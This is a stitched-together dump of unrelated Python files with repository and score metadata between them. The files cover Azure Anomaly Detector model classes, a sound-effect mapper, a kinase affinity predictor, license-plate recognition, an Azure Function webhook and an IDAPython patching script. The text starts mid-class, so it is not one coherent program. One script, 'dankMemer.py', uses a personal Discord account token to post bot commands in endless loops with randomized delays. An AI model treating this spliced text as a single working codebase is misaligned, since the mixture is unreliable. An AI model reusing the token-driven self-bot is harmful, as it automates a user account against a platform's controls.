def __init__(
self,
**kwargs
):
super(DetectionResultSummary, self).__init__(**kwargs)
self.status = kwargs['status']
self.errors = kwargs.get('errors', None)
self.variable_states = kwargs.get('variable_states', None)
self.setup_info = kwargs['setup_info']
class DetectRequest(msrest.serialization.Model):
"""DetectRequest.
All required parameters must be populated in order to send to Azure.
:param series: Required. Time series data points. Points should be sorted by timestamp in
ascending order to match the anomaly detection result. If the data is not sorted correctly or
there is duplicated timestamp, the API will not work. In such case, an error message will be
returned.
:type series: list[~azure.ai.anomalydetector.models.TimeSeriesPoint]
:param granularity: Optional argument, can be one of yearly, monthly, weekly, daily, hourly,
minutely, secondly, microsecond or none. If granularity is not present, it will be none by
default. If granularity is none, the timestamp property in time series point can be absent.
Possible values include: "yearly", "monthly", "weekly", "daily", "hourly", "minutely",
"secondly", "microsecond", "none".
:type granularity: str or ~azure.ai.anomalydetector.models.TimeGranularity
:param custom_interval: Custom Interval is used to set non-standard time interval, for example,
if the series is 5 minutes, request can be set as {"granularity":"minutely",
"customInterval":5}.
:type custom_interval: int
:param period: Optional argument, periodic value of a time series. If the value is null or does
not present, the API will determine the period automatically.
:type period: int
:param max_anomaly_ratio: Optional argument, advanced model parameter, max anomaly ratio in a
time series.
:type max_anomaly_ratio: float
:param sensitivity: Optional argument, advanced model parameter, between 0-99, the lower the
value is, the larger the margin value will be which means less anomalies will be accepted.
:type sensitivity: int
"""
_validation = {
'series': {'required': True},
}
_attribute_map = {
'series': {'key': 'series', 'type': '[TimeSeriesPoint]'},
'granularity': {'key': 'granularity', 'type': 'str'},
'custom_interval': {'key': 'customInterval', 'type': 'int'},
'period': {'key': 'period', 'type': 'int'},
'max_anomaly_ratio': {'key': 'maxAnomalyRatio', 'type': 'float'},
'sensitivity': {'key': 'sensitivity', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(DetectRequest, self).__init__(**kwargs)
self.series = kwargs['series']
self.granularity = kwargs.get('granularity', None)
self.custom_interval = kwargs.get('custom_interval', None)
self.period = kwargs.get('period', None)
self.max_anomaly_ratio = kwargs.get('max_anomaly_ratio', None)
self.sensitivity = kwargs.get('sensitivity', None)
class DiagnosticsInfo(msrest.serialization.Model):
"""DiagnosticsInfo.
:param model_state:
:type model_state: ~azure.ai.anomalydetector.models.ModelState
:param variable_states:
:type variable_states: list[~azure.ai.anomalydetector.models.VariableState]
"""
_attribute_map = {
'model_state': {'key': 'modelState', 'type': 'ModelState'},
'variable_states': {'key': 'variableStates', 'type': '[VariableState]'},
}
def __init__(
self,
**kwargs
):
super(DiagnosticsInfo, self).__init__(**kwargs)
self.model_state = kwargs.get('model_state', None)
self.variable_states = kwargs.get('variable_states', None)
class EntireDetectResponse(msrest.serialization.Model):
"""EntireDetectResponse.
All required parameters must be populated in order to send to Azure.
:param period: Required. Frequency extracted from the series, zero means no recurrent pattern
has been found.
:type period: int
:param expected_values: Required. ExpectedValues contain expected value for each input point.
The index of the array is consistent with the input series.
:type expected_values: list[float]
:param upper_margins: Required. UpperMargins contain upper margin of each input point.
UpperMargin is used to calculate upperBoundary, which equals to expectedValue + (100 -
marginScale)*upperMargin. Anomalies in response can be filtered by upperBoundary and
lowerBoundary. By adjusting marginScale value, less significant anomalies can be filtered in
client side. The index of the array is consistent with the input series.
:type upper_margins: list[float]
:param lower_margins: Required. LowerMargins contain lower margin of each input point.
LowerMargin is used to calculate lowerBoundary, which equals to expectedValue - (100 -
marginScale)*lowerMargin. Points between the boundary can be marked as normal ones in client
side. The index of the array is consistent with the input series.
:type lower_margins: list[float]
:param is_anomaly: Required. IsAnomaly contains anomaly properties for each input point. True
means an anomaly either negative or positive has been detected. The index of the array is
consistent with the input series.
:type is_anomaly: list[bool]
:param is_negative_anomaly: Required. IsNegativeAnomaly contains anomaly status in negative
direction for each input point. True means a negative anomaly has been detected. A negative
anomaly means the point is detected as an anomaly and its real value is smaller than the
expected one. The index of the array is consistent with the input series.
:type is_negative_anomaly: list[bool]
:param is_positive_anomaly: Required. IsPositiveAnomaly contain anomaly status in positive
direction for each input point. True means a positive anomaly has been detected. A positive
anomaly means the point is detected as an anomaly and its real value is larger than the
expected one. The index of the array is consistent with the input series.
:type is_positive_anomaly: list[bool]
"""
_validation = {
'period': {'required': True},
'expected_values': {'required': True},
'upper_margins': {'required': True},
'lower_margins': {'required': True},
'is_anomaly': {'required': True},
'is_negative_anomaly': {'required': True},
'is_positive_anomaly': {'required': True},
}
_attribute_map = {
'period': {'key': 'period', 'type': 'int'},
'expected_values': {'key': 'expectedValues', 'type': '[float]'},
'upper_margins': {'key': 'upperMargins', 'type': '[float]'},
'lower_margins': {'key': 'lowerMargins', 'type': '[float]'},
'is_anomaly': {'key': 'isAnomaly', 'type': '[bool]'},
'is_negative_anomaly': {'key': 'isNegativeAnomaly', 'type': '[bool]'},
'is_positive_anomaly': {'key': 'isPositiveAnomaly', 'type': '[bool]'},
}
def __init__(
self,
**kwargs
):
super(EntireDetectResponse, self).__init__(**kwargs)
self.period = kwargs['period']
self.expected_values = kwargs['expected_values']
self.upper_margins = kwargs['upper_margins']
self.lower_margins = kwargs['lower_margins']
self.is_anomaly = kwargs['is_anomaly']
self.is_negative_anomaly = kwargs['is_negative_anomaly']
self.is_positive_anomaly = kwargs['is_positive_anomaly']
class ErrorResponse(msrest.serialization.Model):
"""ErrorResponse.
All required parameters must be populated in order to send to Azure.
:param code: Required. The error Code.
:type code: str
:param message: Required. A message explaining the error reported by the service.
:type message: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.code = kwargs['code']
self.message = kwargs['message']
class LastDetectResponse(msrest.serialization.Model):
"""LastDetectResponse.
All required parameters must be populated in order to send to Azure.
:param period: Required. Frequency extracted from the series, zero means no recurrent pattern
has been found.
:type period: int
:param suggested_window: Required. Suggested input series points needed for detecting the
latest point.
:type suggested_window: int
:param expected_value: Required. Expected value of the latest point.
:type expected_value: float
:param upper_margin: Required. Upper margin of the latest point. UpperMargin is used to
calculate upperBoundary, which equals to expectedValue + (100 - marginScale)*upperMargin. If
the value of latest point is between upperBoundary and lowerBoundary, it should be treated as
normal value. By adjusting marginScale value, anomaly status of latest point can be changed.
:type upper_margin: float
:param lower_margin: Required. Lower margin of the latest point. LowerMargin is used to
calculate lowerBoundary, which equals to expectedValue - (100 - marginScale)*lowerMargin.
:type lower_margin: float
:param is_anomaly: Required. Anomaly status of the latest point, true means the latest point is
an anomaly either in negative direction or positive direction.
:type is_anomaly: bool
:param is_negative_anomaly: Required. Anomaly status in negative direction of the latest point.
True means the latest point is an anomaly and its real value is smaller than the expected one.
:type is_negative_anomaly: bool
:param is_positive_anomaly: Required. Anomaly status in positive direction of the latest point.
True means the latest point is an anomaly and its real value is larger than the expected one.
:type is_positive_anomaly: bool
"""
_validation = {
'period': {'required': True},
'suggested_window': {'required': True},
'expected_value': {'required': True},
'upper_margin': {'required': True},
'lower_margin': {'required': True},
'is_anomaly': {'required': True},
'is_negative_anomaly': {'required': True},
'is_positive_anomaly': {'required': True},
}
_attribute_map = {
'period': {'key': 'period', 'type': 'int'},
'suggested_window': {'key': 'suggestedWindow', 'type': 'int'},
'expected_value': {'key': 'expectedValue', 'type': 'float'},
'upper_margin': {'key': 'upperMargin', 'type': 'float'},
'lower_margin': {'key': 'lowerMargin', 'type': 'float'},
'is_anomaly': {'key': 'isAnomaly', 'type': 'bool'},
'is_negative_anomaly': {'key': 'isNegativeAnomaly', 'type': 'bool'},
'is_positive_anomaly': {'key': 'isPositiveAnomaly', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(LastDetectResponse, self).__init__(**kwargs)
self.period = kwargs['period']
self.suggested_window = kwargs['suggested_window']
self.expected_value = kwargs['expected_value']
self.upper_margin = kwargs['upper_margin']
self.lower_margin = kwargs['lower_margin']
self.is_anomaly = kwargs['is_anomaly']
self.is_negative_anomaly = kwargs['is_negative_anomaly']
self.is_positive_anomaly = kwargs['is_positive_anomaly']
class Model(msrest.serialization.Model):
"""Response of get model.
All required parameters must be populated in order to send to Azure.
:param model_id: Required. Model identifier.
:type model_id: str
:param created_time: Required. Date and time (UTC) when the model was created.
:type created_time: ~datetime.datetime
:param last_updated_time: Required. Date and time (UTC) when the model was last updated.
:type last_updated_time: ~datetime.datetime
:param model_info: Training Status of the model.
:type model_info: ~azure.ai.anomalydetector.models.ModelInfo
"""
_validation = {
'model_id': {'required': True},
'created_time': {'required': True},
'last_updated_time': {'required': True},
}
_attribute_map = {
'model_id': {'key': 'modelId', 'type': 'str'},
'created_time': {'key': 'createdTime', 'type': 'iso-8601'},
'last_updated_time': {'key': 'lastUpdatedTime', 'type': 'iso-8601'},
'model_info': {'key': 'modelInfo', 'type': 'ModelInfo'},
}
def __init__(
self,
**kwargs
):
super(Model, self).__init__(**kwargs)
self.model_id = kwargs['model_id']
self.created_time = kwargs['created_time']
self.last_updated_time = kwargs['last_updated_time']
self.model_info = kwargs.get('model_info', None)
class ModelInfo(msrest.serialization.Model):
"""Train result of a model including status, errors and diagnose info for model and variables.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param sliding_window: An optional field, indicates how many history points will be used to
determine the anomaly score of one subsequent point.
:type sliding_window: int
:param align_policy: An optional field, since those multivariate need to be aligned in the same
timestamp before starting the detection.
:type align_policy: ~azure.ai.anomalydetector.models.AlignPolicy
:param source: Required. source file link of the input variables, each variable will be a csv
with two columns, the first column will be timestamp, the second column will be value.Besides
these variable csv files, an extra meta.json can be included in th zip file if you would like
to rename a variable.Be default, the file name of the variable will be used as the variable
name.
:type source: str
:param start_time: Required. require field, start time of data be used for generating
multivariate anomaly detection model, should be data-time.
:type start_time: ~datetime.datetime
:param end_time: Required. require field, end time of data be used for generating multivariate
anomaly detection model, should be data-time.
:type end_time: ~datetime.datetime
:param display_name: optional field, name of the model.
:type display_name: str
:ivar status: Model training status. Possible values include: "CREATED", "RUNNING", "READY",
"FAILED".
:vartype status: str or ~azure.ai.anomalydetector.models.ModelStatus
:ivar errors: Error message when fails to create a model.
:vartype errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
:ivar diagnostics_info: Used for deep analysis model and variables.
:vartype diagnostics_info: ~azure.ai.anomalydetector.models.DiagnosticsInfo
"""
_validation = {
'source': {'required': True},
'start_time': {'required': True},
'end_time': {'required': True},
'display_name': {'max_length': 24, 'min_length': 0},
'status': {'readonly': True},
'errors': {'readonly': True},
'diagnostics_info': {'readonly': True},
}
_attribute_map = {
'sliding_window': {'key': 'slidingWindow', 'type': 'int'},
'align_policy': {'key': 'alignPolicy', 'type': 'AlignPolicy'},
'source': {'key': 'source', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'display_name': {'key': 'displayName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
'diagnostics_info': {'key': 'diagnosticsInfo', 'type': 'DiagnosticsInfo'},
}
def __init__(
self,
**kwargs
):
super(ModelInfo, self).__init__(**kwargs)
self.sliding_window = kwargs.get('sliding_window', None)
self.align_policy = kwargs.get('align_policy', None)
self.source = kwargs['source']
self.start_time = kwargs['start_time']
self.end_time = kwargs['end_time']
self.display_name = kwargs.get('display_name', None)
self.status = None
self.errors = None
self.diagnostics_info = None
class ModelList(msrest.serialization.Model):
"""Response to the list models operation.
All required parameters must be populated in order to send to Azure.
:param models: Required. List of models.
:type models: list[~azure.ai.anomalydetector.models.ModelSnapshot]
:param current_count: Required. Current count of trained multivariate models.
:type current_count: int
:param max_count: Required. Max number of models that can be trained for this subscription.
:type max_count: int
:param next_link: next link to fetch more models.
:type next_link: str
"""
_validation = {
'models': {'required': True},
'current_count': {'required': True},
'max_count': {'required': True},
}
_attribute_map = {
'models': {'key': 'models', 'type': '[ModelSnapshot]'},
'current_count': {'key': 'currentCount', 'type': 'int'},
'max_count': {'key': 'maxCount', 'type': 'int'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ModelList, self).__init__(**kwargs)
self.models = kwargs['models']
self.current_count = kwargs['current_count']
self.max_count = kwargs['max_count']
self.next_link = kwargs.get('next_link', None)
class ModelSnapshot(msrest.serialization.Model):
"""ModelSnapshot.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param model_id: Required. Model identifier.
:type model_id: str
:param created_time: Required. Date and time (UTC) when the model was created.
:type created_time: ~datetime.datetime
:param last_updated_time: Required. Date and time (UTC) when the model was last updated.
:type last_updated_time: ~datetime.datetime
:ivar status: Required. Model training status. Possible values include: "CREATED", "RUNNING",
"READY", "FAILED".
:vartype status: str or ~azure.ai.anomalydetector.models.ModelStatus
:param display_name:
:type display_name: str
:param variables_count: Required. Count of variables.
:type variables_count: int
"""
_validation = {
'model_id': {'required': True},
'created_time': {'required': True},
'last_updated_time': {'required': True},
'status': {'required': True, 'readonly': True},
'variables_count': {'required': True},
}
_attribute_map = {
'model_id': {'key': 'modelId', 'type': 'str'},
'created_time': {'key': 'createdTime', 'type': 'iso-8601'},
'last_updated_time': {'key': 'lastUpdatedTime', 'type': 'iso-8601'},
'status': {'key': 'status', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'variables_count': {'key': 'variablesCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(ModelSnapshot, self).__init__(**kwargs)
self.model_id = kwargs['model_id']
self.created_time = kwargs['created_time']
self.last_updated_time = kwargs['last_updated_time']
self.status = None
self.display_name = kwargs.get('display_name', None)
self.variables_count = kwargs['variables_count']
class ModelState(msrest.serialization.Model):
"""ModelState.
:param epoch_ids: Epoch id.
:type epoch_ids: list[int]
:param train_losses:
:type train_losses: list[float]
:param validation_losses:
:type validation_losses: list[float]
:param latencies_in_seconds:
:type latencies_in_seconds: list[float]
"""
_attribute_map = {
'epoch_ids': {'key': 'epochIds', 'type': '[int]'},
'train_losses': {'key': 'trainLosses', 'type': '[float]'},
'validation_losses': {'key': 'validationLosses', 'type': '[float]'},
'latencies_in_seconds': {'key': 'latenciesInSeconds', 'type': '[float]'},
}
def __init__(
self,
**kwargs
):
super(ModelState, self).__init__(**kwargs)
self.epoch_ids = kwargs.get('epoch_ids', None)
self.train_losses = kwargs.get('train_losses', None)
self.validation_losses = kwargs.get('validation_losses', None)
self.latencies_in_seconds = kwargs.get('latencies_in_seconds', None)
class TimeSeriesPoint(msrest.serialization.Model):
"""TimeSeriesPoint.
All required parameters must be populated in order to send to Azure.
:param timestamp: Optional argument, timestamp of a data point (ISO8601 format).
:type timestamp: ~datetime.datetime
:param value: Required. The measurement of that point, should be float.
:type value: float
"""
_validation = {
'value': {'required': True},
}
_attribute_map = {
'timestamp': {'key': 'timestamp', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(TimeSeriesPoint, self).__init__(**kwargs)
self.timestamp = kwargs.get('timestamp', None)
self.value = kwargs['value']
class VariableState(msrest.serialization.Model):
"""VariableState.
:param variable: Variable name.
:type variable: str
:param filled_na_ratio: Merged NA ratio of a variable.
:type filled_na_ratio: float
:param effective_count: Effective time-series points count.
:type effective_count: int
:param start_time: Start time of a variable.
:type start_time: ~datetime.datetime
:param end_time: End time of a variable.
:type end_time: ~datetime.datetime
:param errors: Error message when parse variable.
:type errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
"""
_validation = {
'filled_na_ratio': {'maximum': 1, 'minimum': 0},
}
_attribute_map = {
'variable': {'key': 'variable', 'type': 'str'},
'filled_na_ratio': {'key': 'filledNARatio', 'type': 'float'},
'effective_count': {'key': 'effectiveCount', 'type': 'int'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
}
def __init__(
self,
**kwargs
):
super(VariableState, self).__init__(**kwargs)
self.variable = kwargs.get('variable', None)
self.filled_na_ratio = kwargs.get('filled_na_ratio', None)
self.effective_count = kwargs.get('effective_count', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.errors = kwargs.get('errors', None)
| 2.0625 | 2 |
modules/dankMemer.py | YottGG/The-all-in-one-discord-tool | 0 | 12786273 | from colored import fg, attr
import requests
import threading
import time
import random
r = fg(241) # Setup color variables
r2 = fg(255)
b = fg(31)
w = fg(15)
def start():
token = input(f"\n {r2}[{b}?{r2}] Token: ")
channel = input(f" {r2}[{b}?{r2}] Channel Id: ")
def execute_command(command = "", cooldown = 0):
print(f"{r2}[{b}!{r2} Loaded: '{command}' With cooldown of {cooldown} Seconds")
while True:
requests.post(
f"https://discord.com/api/channels/{channel}/messages",
data = {'content': command},
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
)
print(f"{r2}[{b}+{r2}] '{command}' Ran successfully")
time.sleep(cooldown + random.randint(2, 10))
commands = {
"pls beg" : 45,
"pls hunt" : 40,
"pls fish" : 40,
"pls daily" : 86400
}
print()
for cmd, cooldown in commands.items():
threading.Thread(target = execute_command, kwargs = {"command" : cmd, "cooldown" : cooldown}).start()
time.sleep(5)
| 2.609375 | 3 |
sound_stuff.py | VarunBabbar/Stroodle | 0 | 12786274 | <gh_stars>0
from nltk.stem import PorterStemmer
#from nltk.tokenize import sent_tokenize, word_tokenize
# TODO: Word2Vec
# Names
names = ["John", "Donald"]
# colours
colours = ["red", "blue", "green", "yellow", "orange", "pink", "purple"]
# key story phrases
story_phrases = ["Once upon a time", "time"]
# kinematic action words
kinematics = ["walking", "running", "jumping", "skipping"]
# short clip sound effects - dictionary
sound_effects = {"thunder":"Storm_exclamation_wav.wav",
"lion":"European_Dragon_Roaring_and_breathe_fire-daniel-simon_wav.wav",
"dancing": "despacito.wav",
"dancing.": "despacito.wav",
"dance": "despacito.wav",
"thank you": "wish_you.wav",
"Christmas": "wish_you.wav",
"Christmas.": "wish_you.wav",
"warrior":" ",
"fire":" "}
# audio clips
negative_music = 'Beethoven-MoonlightSonata_wav.wav'
positive_music = 'SCOTT_JOPLIN_The_Entertainer_wav.wav'
def remove_unwanted_words(search_term):
search_list = search_term.split(' ')
for i in search_list:
if i in colours or i in names or i in story_phrases:
search_list.remove(i)
search_term = ' '.join(search_list)
#print(search_term)
return search_term
def which_background_audio(sentiment):
#
# #sentiment - tuple (value, type) - HIGHEST amongst all
# # keywords is a list
# audio_clip = ' '
#
# #if (sentiment[1] == 'Neutral' or sentiment[1] == 'Mixed'):
# # pass
#
# if sentiment[1] == 'Negative':
#
if (sentiment[1] == 'Positive'):
return positive_music
else:
return negative_music
def which_sound_effect(search_term):
keywords = search_term.split(' ')
ps = PorterStemmer()
#print(sound_effects.keys)
try:
for word in keywords:
print(ps.stem(word))
if ps.stem(word) in sound_effects.keys():
key = ps.stem(word)
audio_clip = sound_effects[key]
#print(audio_clip)
except:
audio_clip = ' '
return audio_clip
#print(which_sound_effect('thunder waits'))
#remove_unwanted_words('red dragon thunder')
#print(which_background_audio(0.5))
| 2.875 | 3 |
get_kinase_pki.py | sirimullalab/kinasepkipred | 10 | 12786275 | from __future__ import print_function, absolute_import
# Script to predict (or test) the model using protein (kinase) sequence and SMILE pattern of a compound.
# Usage: python2 get_kinase_pki.py protein_sequence "SMILE_Pattern"
import numpy as np
from pydpi.pypro import PyPro
import pandas as pd
import json
import multiprocessing as mp
import os
import sys
import numpy as np
from sklearn.externals import joblib
from utility import FeatureGenerator
#from keras.models import load_model
import pickle
class pKiPred(object):
def __init__(self):
self.model = joblib.load(os.path.join(os.path.dirname(__file__), 'Random_forest_gridsearch_py27.mdl'))
def get_smi_features(self, smiles):
try:
feat_gen = FeatureGenerator(smiles)
features = feat_gen.toTPATF()
return features
except:
return None
def get_features(self, seq, smi):
p = PyPro()
try:
p.ReadProteinSequence(seq)
features = list(p.GetALL().values())
smi_features = self.get_smi_features(smi)
smi_features2 = list(np.array([f for f in smi_features], dtype=np.float32))
total_features = np.array(features+smi_features2)[np.newaxis, :]
# total_features = np.array(smi_features2+features)[np.newaxis, :] # does not work...!
return total_features
except Exception as e:
print(str(e))
return None
def predict(self, seq, smi):
protein_feature = self.get_features(seq, smi)
return self.model.predict(protein_feature)
def main():
seq = "MGCGCSSHPEDDWMENIDVCENCHYPIVPLDGKGTLLIRNGSEVRDPLVTYEGSNPPASPLQDNLVIALHSYEPSHDGDLGFEKGEQLRILEQSGEWWKAQSLTTGQEGFIPFNFVAKANSLEPEPWFFK<KEY>"
smile = "CC(C)Oc1ccc(cc1Cl)c2noc(n2)c3ccc(N[C@H]4CC[C@H](C4)C(=O)O)cc3"
pkipred = pKiPred()
if len(sys.argv) == 1:
print(pkipred.predict(seq, smile))
else:
print(pkipred.predict(sys.argv[1], sys.argv[2]))
if __name__=="__main__":
main()
| 2.4375 | 2 |
src/plate.py | webdesign4site/License-Plate-Recognition-Using-Deep-Learning | 2 | 12786276 | from keras.models import load_model
from keras.preprocessing import image
import numpy as np
import cv2
from keras.backend import tensorflow_backend as K
import os
import glob
import time
import keras
from matplotlib import pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K2
#IOU calc
iou_smooth=1.
#Unet ile plaka bulmak icin gerekli input size'ları
img_width, img_height = 256, 256
char_list = ["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","R","S","T","U","V","Y","Z","X","W"]
#Unet icin gereken loss fonksyonu, kesisen alana gore loss hesaplar
def IOU_calc(y_true, y_pred):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return 2*(intersection + iou_smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + iou_smooth)
def IOU_calc_loss(y_true, y_pred):
return 1-IOU_calc(y_true, y_pred)
#Plakadaki karakterlerin sıralanması icin, karakterleri en'lerine bakarak sıralar
def compareRectWidth(a,b):
return a < b
# Unet modeli yukluyor,
model_unet = load_model('../src/gumruk_unetGU002.h5',custom_objects={'IOU_calc_loss': IOU_calc_loss, 'IOU_calc': IOU_calc})
#CNN modelini yukluyor, karakter tanıma icin
# CNN modelinin input sizeları
img_rows, img_cols = 28, 28
batch_size = 128
num_classes = 35
epochs = 12
if K2.image_data_format() == 'channels_first':
input_shape = (1, img_rows, img_cols)
else:
input_shape = (img_rows, img_cols, 1)
model_cnn = Sequential()
model_cnn.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model_cnn.add(Conv2D(64, (3, 3), activation='relu'))
model_cnn.add(MaxPooling2D(pool_size=(2, 2)))
model_cnn.add(Dropout(0.25))
model_cnn.add(Flatten())
model_cnn.add(Dense(128, activation='relu'))
model_cnn.add(Dropout(0.5))
model_cnn.add(Dense(num_classes, activation='softmax'))
model_cnn.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model_cnn.load_weights('../src/mert_cnn.h5')
#unet ile plakayi bulup, return ediyor. input olarak image path alıyor
def getPlateImage(filepath):
image = cv2.imread(filepath)
plate = image
originalImage = image
##model icin gerekli input boyutunu hazirliyor.
image = cv2.resize(image, (256, 256)).astype("float32")
image = np.expand_dims(image, axis=0)
#prediction binary image dönüyor
pred = model_unet.predict(image)
pred = pred.reshape((256,256,1))
pred = pred.astype(np.float32)
pred = pred*255
pred = cv2.resize(pred, (originalImage.shape[1], originalImage.shape[0]))
pred=np.uint8(pred)
#resimdeki en buyuk beyaz alanı alıp(plaka lokasyonu) kesiyor
contours, hierarchy = cv2.findContours(pred,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
largestArea = 0
for contour in contours:
tArea = cv2.contourArea(contour)
if tArea > largestArea:
largestArea = tArea
x,y,w,h = cv2.boundingRect(contour)
if largestArea > 0:
plate = originalImage[y:y+h,x:x+w]
else:
print("PLATE COULD NOT FOUND")
return plate
#plaka resmini alıp
def getPlateString(plate):
grayPlate = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)
roiList = []
wList = []
charList = []
retval, binary = cv2.threshold(grayPlate, 30.0, 255.0, cv2.THRESH_BINARY+cv2.THRESH_OTSU)
contours,hierarchy = cv2.findContours(binary,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
idx =0
plateStr = []
for cnt in contours:
idx += 1
x,y,w,h = cv2.boundingRect(cnt)
roi=plate[y:y+h,x:x+w]
if w > 15 and h > 30 and w <100 and h< 100:
roiList.append(roi)
wList.append(x)
#cv2.imwrite("/home/utku/Desktop/rois/" + str(idx) +".jpg", roi)
#cv2.waitKey(100)
#predict roi, resize may needed
#roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
roi = np.asarray(roi)
roi = np.resize(roi, (28,28))
if K2.image_data_format() == 'channels_first':
roi = roi.reshape(roi.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
roi = roi.reshape(1, img_rows, img_cols, 1)
#roi = np.resize(roi, (28,28,1))
#roi = np.expand_dims(roi, axis=0)
roi = roi/255
pred = model_cnn.predict(roi)
#get index
print("pred: ", pred)
predd = pred[0]
char_idx = np.argmax(predd)
#char_idx = np.where(predd == 1) ##1 olanın indexi
plate_char = char_list[char_idx];
#append result to plateStr, may map the predict to a char(BUT HOW)
plateStr.append(plate_char)
print("plate_char is: ", plate_char)
#break
#sorting from left to right
charList = [x for _,x in sorted(zip(wList,plateStr))]
return charList
#plate = getPlateImage("sampleplate.jpg")
#plateString = getPlateString(plate)
#if 'X' in plateString: plateString.remove('X')
#print("plateString: ", plateString)
| 2.6875 | 3 |
AzureFunctions/tcr_notification/__init__.py | tobiheim/teams-call-records-api | 2 | 12786277 | <gh_stars>1-10
"""
Description:
Web-Hook to collect Call Id's and write them to a Service Bus
Disclaimer:
This code is provided AS IS without warranty of any kind. The author disclaim all implied warranties including,
without limitation, any implied warranties of merchantability or of fitness for a particular purpose.
The entire risk arising out of the use or performance remains with you. In no event will be the author liable
for any damages, whatsoever (including, without limitation, damages for loss of business profits, business interruption,
loss of business information, or other pecuniary loss) arising out of the use of or inability to use the code.
Known issues:
"""
import logging
import urllib.parse
import json
import os
import sys
import azure.functions as func
from __app__.sb_eh_helper.sb_eh_helper import sbHelper
import __app__.constants.constants as constants
# Check query results and write to Service Bus
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
result = str()
validationToken = req.params.get('validationToken')
if not validationToken:
try:
req_body = json.dumps(req.get_json())
except ValueError:
req_body = None
logging.info('Send Call-ID to Azure Service Bus: %s', constants.SB_CONNECTION_STR)
sb_sender = sbHelper(constants.SB_CONNECTION_STR, constants.TOPIC_NAME, constants.SUBSCRIPTION_NAME)
try:
sb_sender.sb_send(req_body)
except:
sys.exit('Failed to send Call-ID to Azure Service Bus')
return func.HttpResponse(
result,
status_code=200)
else:
return func.HttpResponse(
urllib.parse.unquote_plus(validationToken),
status_code=200) | 2.3125 | 2 |
tools/patch_codegen.py | joeleong/idapython | 0 | 12786278 |
import os, re
try:
from argparse import ArgumentParser
except:
print "Failed to import module 'argparse'. Upgrade to Python 2.7, copy argparse.py to this directory or try 'apt-get install python-argparse'"
raise
parser = ArgumentParser(description='Patch some code generation, so it builds')
parser.add_argument("-f", "--file", required=True)
parser.add_argument("-p", "--patches", required=True)
parser.add_argument("-v", "--verbose", default=False, action="store_true")
parser.add_argument("-V", "--apply-valist-patches", default=False, action="store_true")
args = parser.parse_args()
patched_cmt = "// patched by patch_codegen.py"
if os.path.isfile(args.patches):
with open(args.patches, "r") as fin:
patches = eval(fin.read())
wrap_regex = re.compile(r"SWIGINTERN PyObject \*_wrap_([a-zA-Z0-9_]*)\(.*")
director_method_regex = re.compile(r".*(SwigDirector_[a-zA-Z0-9_]*::[a-zA-Z0-9_]*)\(.*")
swig_clink_var_get_regex = re.compile(r"SWIGINTERN PyObject \*(Swig_var_[a-zA-Z0-9_]*_get).*")
swig_clink_var_set_regex = re.compile(r"SWIGINTERN int (Swig_var_[a-zA-Z0-9_]*_set).*")
lines = []
with open(args.file, "rb") as f:
STAT_UNKNOWN = {}
STAT_IN_FUNCTION = {}
stat = STAT_UNKNOWN
func_patches = []
entered_function = False
for line in f:
m = wrap_regex.match(line)
if not m:
m = director_method_regex.match(line)
if not m:
m = swig_clink_var_get_regex.match(line)
if not m:
m = swig_clink_var_set_regex.match(line)
if m:
stat = STAT_IN_FUNCTION
fname = m.group(1)
entered_function = True
func_patches = patches.get(fname, [])
else:
for patch_kind, patch_data in func_patches:
if patch_kind == "va_copy":
if args.apply_valist_patches:
dst_va, src_va = patch_data
target = "%s = *%s;" % (dst_va, src_va)
if line.strip() == target:
line = "set_vva(%s, *%s); %s\n" % (dst_va, src_va, patched_cmt)
elif patch_kind == "acquire_gil":
if entered_function:
line = " PYW_GIL_GET; %s\n%s" % (patched_cmt, line)
elif patch_kind == "repl_text":
idx = line.find(patch_data[0])
if idx > -1:
line = line.rstrip().replace(patch_data[0], patch_data[1])
line = "%s %s\n" % (line, patched_cmt)
else:
raise Exception("Unknown patch kind: %s" % patch_kind)
entered_function = False
lines.append(line)
tmp_file = "%s.tmp" % args.file
with open(tmp_file, "w") as f:
f.writelines(lines)
os.unlink(args.file)
os.rename(tmp_file, args.file)
